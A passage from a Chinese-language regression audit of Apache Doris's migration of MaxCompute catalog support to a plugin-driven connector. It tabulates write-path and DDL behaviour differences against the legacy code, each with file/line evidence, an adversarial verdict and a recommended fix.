PluginDrivenTransactionManager.java:183-185 / MaxComputeConnectorTransaction.java:158-160 链路上 getUpdateCnt 存在但无调用方。历史(设计/HANDOFF/decisions/deviations)无任何 loadedRows/affected-rows 退化记录。 | +| WRITE-P2 block 分配上限硬编码 20000,忽略 Config.max_compute_write_max_block_count | matches-history | plan-doc/deviations-log.md:21 (DV-011) | 历史 DV-011 已显式记录同一问题:legacy MCTransaction.allocateBlockIdRange 用 fe-core Config.max_compute_write_max_block_count(fe.conf 可调,默认 20000)→ 连接器常量 MAX_BLOCK_COUNT=20000L,'丢 fe.conf 可调性'(import-gate 禁 common.Config)。状态标 🟢 已修正(P4-T03),并留后续动作 'DV-011:[ ] 如运维需可调 block 上限:经 MCConnectorProperties 暴露(非本 task)'。代码核实与历史完全一致:MaxComputeConnectorTransaction.java:72 常量 + :146-148 判越界 vs MCTransaction.java:165-169 + Config.java:2156。本轮无异议,仅指出 DV-011 的'已修正'是指有意 trade-off 落地、可调性丢失仍是一个尚未关闭的 follow-up(运维显式调大配置时产生差异)。 | +| WRITE-C2 翻闸硬编码 block 上限 20000,忽略 fe.conf 覆盖 | matches-history | plan-doc/deviations-log.md:21 (DV-011) | 与 WRITE-P2 同,匹配 DV-011。证据 MaxComputeConnectorTransaction.java:67-72,146-149 vs MCTransaction.java:165-169 + Config.java:2154-2156 与历史一致。两默认值相同(20000=20000),仅运维显式调大该 Config 时翻闸仍在 20000 拒绝。DV-011 已将其作为有意偏差登记并留 MCConnectorProperties 暴露的 follow-up。 | +| WRITE-P3 提交后缓存刷新失败的处理语义对 MaxCompute 改变(legacy 抛错=失败,翻闸吞错=成功) | new | (无历史记录) | 历史(decisions-log/deviations-log/HANDOFF/所有 P4 设计文档)grep 'doAfterCommit'/'handleRefreshTable'/'缓存刷新'/'post-commit' 均零命中——MC 的 post-commit 刷新语义变更从未被讨论。代码核实:PluginDrivenInsertExecutor.java:165-174 override doAfterCommit,try super.doAfterCommit() 后 catch 全部异常仅 warn 不外抛;legacy MCInsertExecutor.java 无 doAfterCommit override → 用基类 BaseExternalTableInsertExecutor.java:133-140 的 handleRefreshTable,失败抛 DdlException。git blame 确认该 override 来自原始 SPI/JDBC 框架 commit 5c325655b8b(非 MC cutover),其 javadoc(:152-163)只为 JDBC_WRITE 论证'报失败会误导用户重试导致重复',从未把 MC 纳入论证范围;MC 经翻闸改走 PluginDrivenInsertExecutor 后被动继承了这套语义。结论:这是 MC 路径上一个未声明的可观察行为变更。注:翻闸行为(commit 后刷新失败→报成功+cache 暂陈旧)对 MC 这种 FE 端已落 ODPS 的事务模型其实比 legacy 更安全(避免诱导重试重复写),但仍属未记录的语义偏移,应补登记一笔 deviation。 | +| WRITE-C3 翻闸吞掉 MC post-commit cache 刷新异常,legacy 抛 DdlException | new | (无历史记录) | 与 WRITE-P3 同,新发现。证据 PluginDrivenInsertExecutor.java:165-174 vs MCInsertExecutor.java(无 override)+ BaseExternalTableInsertExecutor.java:133-140 与历史无冲突也无记录。override 的 javadoc 只覆盖 JDBC_WRITE 语义,未声明对 MC 的影响。minor 级别(更安全但未记录)。 | + +### 路径3 — DDL (CREATE/DROP TABLE, CREATE/DROP DATABASE, RENAME, IF [NOT] EXISTS / FORCE 语义) + +| id | severity | title | evidence (翻闸 / legacy) | legacy-diff | regression | adversarial-verdict | recommendation | +|---|---|---|---|---|---|---|---| +| DDL-P1 | blocker | 翻闸后无 ENGINE 子句的 CREATE TABLE 在分析期直接报错(paddingEngineName 只认 MaxComputeExternalCatalog) | 翻闸 fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/info/CreateTableInfo.java:896-917 (paddingEngineName, line 912 `catalog instanceof MaxComputeExternalCatalog`, else 914-915 throw);catalog 实例类型见 fe/fe-core/src/main/java/org/apache/doris/datasource/CatalogFactory.java:51-52 (max_compute ∈ SPI_READY_TYPES → 112 new PluginDrivenExternalCatalog)
legacy fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/info/CreateTableInfo.java:912 (legacy 下 catalog 是 MaxComputeExternalCatalog,匹配→engineName=ENGINE_MAXCOMPUTE);legacy 实例化 MaxComputeExternalCatalog(extends ExternalCatalog) | legacy:`CREATE TABLE t(...)`(不写 ENGINE)时,paddingEngineName 命中 `instanceof MaxComputeExternalCatalog` 自动补 engineName=maxcompute,建表成功。翻闸后 catalog 变成 PluginDrivenExternalCatalog,既不是 MaxComputeExternalCatalog 也不是 HMS/Iceberg/Paimon,落到 else 分支抛 AnalysisException `Current catalog does not support create table: `。 | yes | ✅存活 (3✓/0✗ of 3) | 修。paddingEngineName 与 checkEngineWithCatalog 需识别 PluginDrivenExternalCatalog(按 getType()=="max_compute" → ENGINE_MAXCOMPUTE,或更通用地按 connector 声明的 engine 名)。否则翻闸后 CREATE TABLE 基本不可用。建议同时在 Phase B 用 live SQL 复现确认。 | +| DDL-P2 | major | 翻闸丢弃 DROP DATABASE ... FORCE 的级联删表语义(force 参数被显式注释为不转发) | 翻闸 fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java:325-341 (dropDb 签名收 force,但 body 从不引用 force;line 335 仅 dropDatabase(session,dbName,ifExists))
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeMetadataOps.java:132-157 (dropDbImpl;line 142-155 `if(force){ 列出 remoteTableNames 逐个 dropTableImpl(tbl,true) }` 然后再 dropDb) | legacy `DROP DATABASE db FORCE`:先 listTableNames(db.getRemoteName()) 把库内每张表逐个远端删除,再删 schema。翻闸完全忽略 force,直接 dropDatabase→McStructureHelper.dropDb→mcClient.schemas().delete()。若 ODPS 拒绝删除非空 schema(常见行为),则 legacy FORCE 成功而翻闸 FORCE 失败/语义不同。 | unsure | ✅存活 (3✓/0✗ of 3) | 待定→倾向修。若 ODPS 删非空 schema 会失败,则必须在翻闸侧补回级联(可在 PluginDrivenExternalCatalog.dropDb 内当 force 时先枚举并 dropTable,或经 SPI 把 force/cascade 透传给 connector)。至少需用真实 ODPS 验证 schemas().delete 对非空库的行为后再定。 | +| DDL-P3 | major | 翻闸 CREATE/DROP TABLE 用本地名直发远端,丢失 legacy 的 local→remote 名映射(lower_case_meta_names / lower_case_database_names 下错库错表) | 翻闸 create:fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java:267-268 (convert(createTableInfo, createTableInfo.getDbName()) 传本地 dbName) → fe/fe-connector/.../MaxComputeConnectorMetadata.java:285-310 (直接用 request.getDbName()/getTableName() 调 tableExist/createTableCreator);drop:PluginDrivenExternalCatalog.java:359 (getTableHandle(session, dbName, tableName) 用本地名) → MaxComputeConnectorMetadata.java:102-113/342-355
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeMetadataOps.java:172-219 (createTableImpl 用 db.getRemoteName():line 179 tableExist(db.getRemoteName(),..)、line 218-219 createTableCreator(odps, db.getRemoteName(),..));dropTableImpl line 266-283 (remoteDbName=dorisTable.getRemoteDbName()=db.getRemoteName(), remoteTblName=dorisTable.getRemoteName());映射来源 ExternalCatalog.java:548-560 (buildMetaCache 按 getLowerCaseDatabaseNames()/lower_case_meta_names 令 localName≠remoteName) | 当 catalog 设了 lower_case_meta_names=true 或 lower_case_database_names=1 时,本地展示名(小写)≠远端真实名(混合大小写)。legacy 始终用 getRemoteName()/getRemoteDbName() 解析回远端真实名再发 ODPS;翻闸直接把用户输入/本地名透传给 ODPS SDK。结果:CREATE 在错误大小写的库名下建表或建在不存在的库;DROP 的 tableExist/getTableHandle 用本地小写名查 ODPS,定位不到真实表 → IF EXISTS 静默不删 / 非 IF EXISTS 误报不存在。 | yes | ✅存活 (3✓/0✗ of 3) | 修。翻闸侧在 createTable/dropTable override 里应先用 getDbForReplay(dbName).get().getRemoteName() 与 db.getTableNullable(tableName).getRemoteName() 解析出远端名,再交给 converter/getTableHandle(对齐 legacy)。否则在大小写不敏感配置下 DDL 错库错表。 | +| DDL-P4 | major | 翻闸 CREATE TABLE 丢失 legacy 对 auto-increment / aggregation 列的拒绝校验(ConnectorColumn 不携带这两类标志) | 翻闸 fe/fe-connector/fe-connector-maxcompute/.../MaxComputeConnectorMetadata.java:375-389 (validateColumns 只查 null/空、重名、类型可转;无 autoInc/aggregated 检查);列模型 fe/fe-connector/fe-connector-api/.../ConnectorColumn.java:25-46 (字段仅 name/type/comment/nullable/defaultValue/isKey,无 isAutoInc/isAggregated);转换器 fe/fe-core/.../CreateTableInfoToConnectorRequestConverter.java:90-92 (构造 ConnectorColumn 不传 autoInc/agg)
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeMetadataOps.java:416-437 (validateColumns:line 422-425 col.isAutoInc()→抛 'Auto-increment columns are not supported';line 426-429 col.isAggregated()→抛 'Aggregation columns are not supported') | legacy 在建表前显式拒绝带 AUTO_INCREMENT 列或带聚合类型(SUM/REPLACE 等)列的 MaxCompute 表,给出明确错误。翻闸侧 ConnectorColumn 根本不携带这两个标志,validateColumns 无从检查 → 这两类列被静默接受并尝试在 ODPS 建表(auto-inc 的自增语义/agg 列的聚合语义在 MC 侧无对应,行为未定义或语义丢失)。 | yes | ✅存活 (3✓/0✗ of 3) | 修或显式接受。若产品要求 MC 拒绝 autoInc/agg 列,需给 ConnectorColumn 增字段并在 converter 传递、connector validateColumns 复查;若可接受(认为上游已拦),需有据记录。当前是静默丢弃语义,违反 D3 完整性。 | +| DDL-C1 | major | partitions() TVF 翻闸后被 analyze 门禁挡死:cutover MaxCompute 上 select * from partitions(...) 直接抛错(BE 取数支路已接但 FE 入口未接) | 翻闸 fe/fe-core/src/main/java/org/apache/doris/tablefunction/PartitionsTableValuedFunction.java:172-176, fe/fe-core/src/main/java/org/apache/doris/tablefunction/PartitionsTableValuedFunction.java:184-185, fe/fe-core/src/main/java/org/apache/doris/tablefunction/MetadataGenerator.java:1317-1318, fe/fe-core/src/main/java/org/apache/doris/tablefunction/MetadataGenerator.java:1359-1377
legacy fe/fe-core/src/main/java/org/apache/doris/tablefunction/PartitionsTableValuedFunction.java:173 (allow-list 含 MaxComputeExternalCatalog), :185 (TableType.MAX_COMPUTE_EXTERNAL_TABLE 允许), MetadataGenerator.java:1315-1316 (dealMaxComputeCatalog) | legacy:partitions("catalog"="mc","database"=...,"table"=...) 可用——MaxComputeExternalCatalog 在 analyze 允许清单内、表类型 MAX_COMPUTE_EXTERNAL_TABLE 在 getTableOrMetaException 允许清单内,然后 MetadataGenerator.dealMaxComputeCatalog 返回分区。cutover:同一查询在 analyze() 阶段直接抛 AnalysisException("Catalog of type 'max_compute' is not allowed in ShowPartitionsStmt")。 | yes | ✅存活 (3✓/0✗ of 3) | 修。在 PartitionsTableValuedFunction.analyze 的 catalog 允许清单(:172-173)加入 `\|\| catalog instanceof PluginDrivenExternalCatalog`,并在 getTableOrMetaException(:184-185)的允许类型加入 TableType.PLUGIN_EXTERNAL_TABLE;否则 cutover 后 partitions() TVF 对 MaxCompute 回归不可用。与 SHOW PARTITIONS 命令侧保持对齐。 | +| DDL-C2 | major | DDL 远端名解析丢失:CREATE/DROP TABLE 用本地名直发连接器,lower_case_meta_names / meta_names_mapping 生效时寻址错误 | 翻闸 fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java:267-268 (createTable 传 createTableInfo.getDbName() 本地名), :357-359 (dropTable 用本地 dbName/tableName 取 handle), fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadata.java:104-112 / :345-349 (handle 直接持本地名并发 SDK)
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeMetadataOps.java:179 (tableExist(db.getRemoteName(), ...)), :219 (createTableCreator(odps, db.getRemoteName(), ...)), :266-267/:270/:283 (dropTableImpl 用 dorisTable.getRemoteDbName()/getRemoteName()) | legacy 在发 SDK 前把本地 db/table 名解析成远端名(db.getRemoteName()、dorisTable.getRemoteDbName()/getRemoteName());翻闸侧 createTable/dropTable 把 nereids 的本地名直接透传给连接器,连接器再原样发给 ODPS SDK。当 catalog 设了 lower_case_meta_names=true 或 meta_names_mapping(ExternalCatalog 通用属性,MaxCompute 也适用)使本地名≠远端名时,翻闸会用错误的(被小写/被映射的)名字寻址 MaxCompute,导致 CREATE 建到错 schema、DROP 找不到表或删错对象。 | yes | ✅存活 (3✓/0✗ of 3) | 修。createTable 应先 getDbNullable(dbName) 取 ExternalDatabase 再用 db.getRemoteName() 作为 dbName 传连接器;dropTable 应先取 dorisTable 用 getRemoteDbName()/getRemoteName() 解析后再 getTableHandle。否则对启用名映射的 catalog 是数据正确性回归(删错/建错对象)。 | +| DDL-C3 | major | DROP DATABASE ... FORCE 的级联语义被静默丢弃 | 翻闸 fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java:324-342 (dropDb 形参 force 完全未使用,仅 dropDatabase(session, dbName, ifExists))
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeMetadataOps.java:132-157 (dropDbImpl 在 force 时 listTableNames 后逐表 dropTableImpl(tbl,true) 再 dropDb) | legacy DROP DATABASE x FORCE:先列出库内远端表逐个 drop,再 drop 库。翻闸侧:force 参数被忽略,直接 dropDatabase→McStructureHelper.dropDb→SDK schemas().delete。若 MaxCompute schema 非空且 SDK delete 不级联,则 DROP ... FORCE 在 legacy 能成功而翻闸会失败/或留下残表;反之 legacy 的 force 语义(强制连表一起删)在翻闸下不再生效。 | yes | ✅存活 (3✓/0✗ of 3) | 修或显式接受并记录。若产品语义要支持 FORCE 级联,应在 override 里复刻 legacy 的逐表 drop;若决定 PluginDriven 不支持 FORCE 级联,至少应在 force=true 且库非空时报明确错误,而非静默忽略。 | +| DDL-P6 | minor | 翻闸 DROP TABLE 不先做 Doris 侧 db/table 解析,db 不存在时错误形态与 legacy 不同 | 翻闸 fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java:353-374 (完整 override,不调 super;直接 getTableHandle(session,dbName,tableName);db 不存在时经 structureHelper.tableExist→ODPS 可能抛 RuntimeException)
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalCatalog.java:1112-1138 (base dropTable:line 1119-1122 getDbNullable 为 null 抛 'Failed to get database';line 1123-1129 getTableNullable 为 null 时 ifExists 直接 return);legacy MC 经此 base 路径(metadataOps!=null) | legacy `DROP TABLE [IF EXISTS] db.t`:base 先 getDbNullable(db)——db 不存在直接抛清晰 DdlException;再 db.getTableNullable(t)——本地无此表且 IF EXISTS 时干净 return(不触远端)。翻闸 override 跳过全部 Doris 侧解析,直奔远端 getTableHandle/tableExist;若 db(project/schema)不存在,ProjectTableHelper.tableExist line 218-225 的 mcClient.tables().exists 可能抛 OdpsException→RuntimeException(未包装成 DdlException),错误形态与 legacy 不一致;IF EXISTS 在 db 缺失场景下也可能因远端异常而非静默 return。 | unsure | ✅存活 (3✓/0✗ of 3) | 待定。若要严格对齐 legacy 的错误语义,翻闸 dropTable 应先做 getDbNullable 检查并保留 base 的 IF EXISTS 本地短路;否则至少把 connector 侧 RuntimeException 包装为 DdlException。优先级低于上面四项。 | +| DDL-C5 | minor | CREATE TABLE IF NOT EXISTS 命中已存在表时,翻闸仍写 logCreateTable + 重置缓存(legacy 为 no-op,不写 editlog) | 翻闸 fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java:269-287 (无论是否实际新建,connector.createTable 返回 void 后一律 logCreateTable 并 resetMetaCacheNames,return false)
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeMetadataOps.java:179-197 (已存在+ifNotExists 返回 true), fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalCatalog.java:1063-1075 (res==true 时不写 logCreateTable) | legacy:CREATE TABLE IF NOT EXISTS 命中已存在表→createTableImpl 返回 true→base createTable 跳过 logCreateTable(不写 editlog、不刷缓存)。翻闸:连接器 createTable 对已存在表静默 return(MaxComputeConnectorMetadata.java:288-296),但 SPI 返回 void、override 无从区分‘新建 vs 已存在’,于是对一次纯 no-op 也写一条 logCreateTable editlog 并 resetMetaCacheNames。 | yes | ✅存活 (3✓/0✗ of 3) | 待定/可接受。若不引入‘已存在’区分,建议至少接受并文档化 editlog 冗余;彻底修需 SPI createTable 返回 created/exists 标志(留待 P5/P6 连接器迁移)。当前不阻塞,但应登记为已知偏差。 | +| DDL-C6 | minor | CREATE TABLE 丢失 legacy 的本地库存在校验、本地表大小写存在校验与 auto-inc/聚合列拒绝 | 翻闸 fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java:264-273 (无 db==null 校验、无 db.getTableNullable 本地校验), fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadata.java:375-389 (validateColumns 只查重名+类型可转,未拒 auto-inc/聚合列)
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeMetadataOps.java:172-197 (db==null 抛错 + 远端 tableExist + 本地 db.getTableNullable 大小写校验), :416-437 (validateColumns 拒 isAutoInc/isAggregated) | legacy createTableImpl:① db==null→"Failed to get database";② 远端 tableExist 校验;③ 额外本地 db.getTableNullable(tableName) 大小写敏感校验;④ validateColumns 显式拒绝 auto-increment 列与聚合列。翻闸 override 仅依赖连接器的远端 tableExist + 重名/类型校验,缺失 ①③④。 | unsure | ✅存活 (3✓/0✗ of 3) | 待定。建议在 override 或连接器补回 db 存在校验与列约束校验以对齐 legacy 防御性;auto-inc/聚合列项需先确认 nereids 上游是否已拦,再决定是否补。优先级低于前述 major 项。 | +| DDL-P7 | question | 翻闸 CREATE TABLE 未校验本地 db 是否存在,且 editlog/cache 失效相对远端操作的顺序与 legacy 相反 | 翻闸 fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java:264-287 (createTable:无 getDbNullable 校验,直接 convert+connector.createTable;顺序为 远端create(270)→editlog(279)→resetMetaCacheNames(283))
legacy createTableImpl 校验 db:fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeMetadataOps.java:172-176 (db==null 抛 UserException);顺序:ExternalMetadataOps.java:92-98 (createTable 默认包装:createTableImpl 远端建→!res 时 afterCreateTable 即 resetMetaCacheNames) 发生在 ExternalCatalog.java:1063-1071 base 写 editlog 之前 → legacy 顺序 远端create→cache失效→editlog | (1) legacy createTableImpl 显式校验本地 db 存在,db 缺失抛 UserException;翻闸不校验,把不存在的 db 名直接交给 ODPS,错误形态不同。(2) 顺序:legacy 是 远端建表→afterCreateTable(cache reset)→logCreateTable;翻闸是 远端建表→logCreateTable→resetMetaCacheNames。master 节点上 cache 仅内存操作、两种顺序对最终态无影响;但若 editlog 写入与 cache 失效之间发生异常,两侧中间态不同。 | unsure | ✅存活 (3✓/0✗ of 3) | 待定/多数可接受。建议补本地 db 存在校验以对齐 legacy 的清晰报错;editlog/cache 顺序差异如无 replay 一致性问题可接受,但应有据记录。 | +| DDL-C4 | major | CREATE DATABASE IF NOT EXISTS 在‘远端已存在但本地缓存未命中’时会抛错(ifNotExists 未透传给连接器/SDK) | 翻闸 fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java:299-313 (仅 getDbNullable 本地短路,随后 createDatabase 不带 ifNotExists), fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadata.java:359-364 (createDatabase 硬编码 structureHelper.createDb(odps, dbName, false))
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeMetadataOps.java:110-124 (createDbImpl 用 databaseExist(dbName) 检查远端存在,ifNotExists 时返回 true 不报错;并把 ifNotExists 传给 createDb) | legacy CREATE DATABASE IF NOT EXISTS:既查本地 getDbNullable 也查远端 databaseExist;只要任一存在且 ifNotExists 即静默成功。翻闸侧:只查本地 getDbNullable;若库远端已存在但本地缓存尚未发现(缓存未刷新/库为带外创建),本地为 null→不短路→调连接器 createDatabase,而连接器把 ifNotExists 硬编码成 false 传给 SDK(McStructureHelper.createDb(...,false)→schemas().create),SDK 对已存在 schema 抛异常。 | yes | ✗否决 (1✓/2✗ of 3) | 修。createDatabase 连接器实现应接受并透传 ifNotExists(SPI ConnectorSchemaOps.createDatabase 当前无该参,需要在 SPI 或 override 内借 databaseExists 做远端短路);最小修法:override 在 ifNotExists 时先 connector.getMetadata(session).databaseExists 检查远端再决定是否短路。 | +| DDL-P5 | minor | 翻闸 CREATE DATABASE 的 IF NOT EXISTS 仅靠本地缓存短路,且向 ODPS 硬传 ifNotExists=false | 翻闸 fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java:299-313 (line 301 仅 getDbNullable(dbName)!=null 短路;line 306 createDatabase(session,dbName,properties)) → fe/fe-connector/.../MaxComputeConnectorMetadata.java:360-364 (createDatabase 硬调 structureHelper.createDb(odps,dbName,false),ifNotExists 恒 false)
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeMetadataOps.java:110-124 (createDbImpl:line 113 exists=databaseExist(dbName) 查远端;line 114 `dorisDb!=null \|\| exists` 综合判断;line 122 createDb(odps,dbName,ifNotExists) 把 ifNotExists 透传 ODPS) | legacy 判 '已存在' 同时看本地缓存与远端 databaseExist,且把 ifNotExists 透传给 ODPS create(McStructureHelper.createDb line 162 `if(ifNotExists && schemas().exists) return`)。翻闸只看本地缓存 getDbNullable;当本地缓存陈旧(库已存在于远端但未进缓存)且用户写 IF NOT EXISTS 时,翻闸不短路、调 createDatabase 且向 ODPS 传 false → ODPS 报 'already exists' 异常,而 legacy 会因远端 exists 检查或 ODPS 端 ifNotExists 而静默成功。 | yes | ✗否决 (0✓/3✗ of 3) | 修。connector.createDatabase 应接收并透传 ifNotExists(或翻闸侧在调用前补一次远端 databaseExists 检查),对齐 legacy 的幂等保证。 | +| DDL-C7 | minor | DROP TABLE 缺本地库存在校验,IF EXISTS 在库不存在时可能抛 RuntimeException 而非干净返回 | 翻闸 fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java:353-365 (无 getDbNullable(dbName) 校验,直接 getTableHandle→连接器), fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadata.java:104 (tableExist 经 McStructureHelper, schema 不存在时 OdpsException→RuntimeException)
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalCatalog.java:1118-1129 (base dropTable 先 db==null 抛 DdlException、dorisTable==null 且 ifExists 干净 return) | legacy(base dropTable 走 metadataOps 分支):先 getDbNullable,db==null 抛明确 DdlException;表不存在且 ifExists 干净返回。翻闸 override 跳过库校验,直接 getTableHandle;若库在远端不存在,McStructureHelper.ProjectSchemaTableHelper.tableExist(:117-123)/ProjectTableHelper.tableExist(:194-200)会把 OdpsException 包成 RuntimeException 上抛,即便 DROP TABLE IF EXISTS 也可能异常而非静默成功。 | unsure | ✗否决 (1✓/0✗ of 3) | 待定/修。建议 override.dropTable 先做 getDbNullable 库存在校验(并解析远端名,见 finding#2),使 IF EXISTS 语义与异常类型对齐 base/legacy。 | + +**Phase C 交叉核对:** + +| finding | 分类 | history_ref | note | +|---|---|---|---| +| DDL-P1 翻闸后无 ENGINE 子句的 CREATE TABLE 在分析期直接报错 (paddingEngineName 只认 MaxComputeExternalCatalog) | new | plan-doc/tasks/designs/P4-batchD-maxcompute-removal-design.md:100 (CreateTableInfo ~:390/:912 instanceof MaxComputeExternalCatalog) | 代码已证实 (CreateTableInfo.java:912 paddingEngineName 只 instanceof MaxComputeExternalCatalog→else:915 throw;CatalogFactory.java:52/112 max_compute→PluginDrivenExternalCatalog)。历史从未把它当作翻闸回归记录:T06c 设计/HANDOFF 的回归矩阵完全没列 CREATE TABLE without ENGINE。更糟:Batch D 设计 line 100 计划删 CreateTableInfo:912 的 instanceof 分支且无 PluginDriven 替代,会把这条隐性回归坐实为永久(无 ENGINE 的 CREATE TABLE 永报 'Current catalog does not support create table')。T06c 只 override 了 ExternalCatalog.createTable,根本到不了 paddingEngineName 之后——但 paddingEngineName 在分析期更早执行,先抛。 | +| DDL-P2 翻闸丢弃 DROP DATABASE ... FORCE 的级联删表语义 (force 被显式注释为不转发) | disagreement | plan-doc/tasks/designs/P4-T06c-fe-dispatch-wiring-design.md:185 (§5 边界) | 代码证实 (PluginDrivenExternalCatalog.java:325 dropDb 收 force,body line 335 仅传 ifExists 不传 force;MaxComputeConnectorMetadata.java:366-371 dropDatabase 无 force/不列表逐删;legacy MaxComputeMetadataOps.java:142-155 force 时逐表 drop)。T06c 设计 §5 line 185 明确写 'force 参数被丢弃...legacy 的 force=级联删表逻辑不复刻...若日后需级联→连接器侧增强(记 OQ)',即历史把这当作可接受的已知语义差。本轮不认同其'可接受'定级:这是 DROP DATABASE FORCE 在非空 ODPS schema 下 legacy 成功而翻闸失败/留残表的语义回归 (major),不应静默吞掉。 | +| DDL-P3 翻闸 CREATE/DROP TABLE 用本地名直发远端,丢失 local→remote 名映射 | new | plan-doc/tasks/designs/P4-T06c-fe-dispatch-wiring-design.md:187 (§5 分区名 db/tbl 名称约定 '验证项') | 代码证实 (PluginDrivenExternalCatalog.java:268 convert 传本地 getDbName();:359 dropTable 用本地 dbName/tableName;MaxComputeConnectorMetadata.java:104/285-286/346-347 直接把 dbName/tableName 喂 structureHelper→ODPS SDK,无 getRemoteName 解析;legacy MaxComputeMetadataOps.java:179/219/266-267 用 db.getRemoteName()/dorisTable.getRemoteDbName())。映射机制存在于 ExternalCatalog.java:549-564/914。历史无任何 DV/决策记录此差异;T06c 设计 §5 line 187 仅把名称约定标为'验证项'并假定'连接器内部解析 remote 映射',但代码显示连接器并不解析——假定与代码不符。lower_case_meta_names/lower_case_database_names 生效时寻址错误。 | +| DDL-P4 翻闸 CREATE TABLE 丢失对 auto-increment / aggregation 列的拒绝校验 | new | plan-doc/deviations-log.md:63 (DV-010,仅记 CHAR/VARCHAR 长度,未涉 autoInc/agg) | 代码证实 (fe-connector-api ConnectorColumn.java 字段仅 name/type/comment/nullable/defaultValue/isKey,无 isAutoInc/isAggregated;MaxComputeConnectorMetadata.java:375-389 validateColumns 只查 null/重名/类型可转;CreateTableInfoToConnectorRequestConverter.java:90-92 不传 autoInc/agg;legacy MaxComputeMetadataOps.java:422-429 显式拒 isAutoInc/isAggregated)。注:存活发现里把 ConnectorColumn 路径写成 fe-connector-maxcompute,实际在 fe-connector-api/.../api/ConnectorColumn.java,转换器从 ColumnDefinition(非 Column)构造——路径细节有出入但实质完全成立。DV-010 证明 CREATE TABLE 确经此有损列模型,但历史从未记 autoInc/agg 拒绝校验丢失。 | +| DDL-P6 翻闸 DROP TABLE 不先做 Doris 侧 db/table 解析,db 不存在时错误形态与 legacy 不同 | new | plan-doc/tasks/designs/P4-T06c-fe-dispatch-wiring-design.md:117-127/186 (dropTable override 设计) | 代码证实 (PluginDrivenExternalCatalog.java:353-374 完整 override 不调 super、不 getDbNullable、直奔 metadata.getTableHandle→structureHelper.tableExist(odps,dbName,tableName);legacy 经 base ExternalCatalog.java:1112-1138 先 getDbNullable null→DdlException、再 db.getTableNullable null+ifExists→return)。T06c 设计描述了 dropTable override 的 handle 解析路径,但未识别'跳过本地 db 解析→db(project/schema)不存在时远端可能抛 RuntimeException 未包装成 DdlException'的错误形态差异。历史未记此项。 | +| DDL-P7 翻闸 CREATE TABLE 未校验本地 db 是否存在,且 editlog/cache 失效顺序与 legacy 相反 | new | plan-doc/tasks/designs/P4-T06c-fe-dispatch-wiring-design.md:24-39/129-131 (缓存失效缺口 + 修 createTable) | 代码证实 (PluginDrivenExternalCatalog.java:264-287 无 getDbNullable 校验;顺序=远端create:270→editlog:279→resetMetaCacheNames:283;legacy MaxComputeMetadataOps.java:172-176 校验 db==null 抛 UserException;ExternalMetadataOps.java createTable default 远端create→afterCreateTable(cache reset),再 base ExternalCatalog.java:1063-1071 写 editlog→legacy 顺序=create→cache→editlog)。T06c 设计深入讨论了缓存失效缺口并补了 resetMetaCacheNames,但:(1) 完全没提及'本地 db 存在校验丢失'(legacy createTableImpl:172 有,override 无);(2) 没识别 create→editlog→cache 与 legacy create→cache→editlog 的顺序倒置(异常窗口中间态不同)。两子点历史均未记。 | +| DDL-C1 partitions() TVF 翻闸后被 analyze 门禁挡死 (BE 取数支路已接但 FE 入口未接) | disagreement | plan-doc/HANDOFF.md:42/61 (矩阵 partitions TVF=✅由T06c接线) + plan-doc/tasks/designs/P4-batchD-maxcompute-removal-design.md:72 (声称 T06c 给 PartitionsTableValuedFunction 加了 PluginDriven 分支) | 最高优先级分歧。代码证实 T06c 只接了 MetadataGenerator(BE 取数支路,:1317-1318 dealPluginDrivenCatalog)和 ShowPartitionsCommand,但 partitions() TVF 的 FE analyze 入口 PartitionsTableValuedFunction.java 完全没接:line 172-176 catalog allow-list 仍只认 InternalCatalog/HMS/MaxComputeExternalCatalog(翻闸后 catalog 是 PluginDrivenExternalCatalog→抛 'Catalog of type max_compute is not allowed');line 184-185 getTableOrMetaException 只允 OLAP/HMS/MAX_COMPUTE_EXTERNAL_TABLE,而 plugin MC 表 type=PLUGIN_EXTERNAL_TABLE(PluginDrivenExternalTable.java:62)→双重挡死。HANDOFF 矩阵和 T06c commit ③ 声称 partitions TVF 已修;Batch D 设计 line 72 更明确声称'T06c adds a PluginDrivenExternalCatalog branch'到 PartitionsTableValuedFunction(:173/:200)——查无实据。后果加倍:Batch D line 102 据此假设计划删 :173 的 MaxCompute 分支并'KEEP 新 PluginDriven 分支',但该文件根本没有 PluginDriven 分支→Batch D 会删掉唯一放行分支,永久坐实 partitions() TVF 对 MC 的回归。 | +| 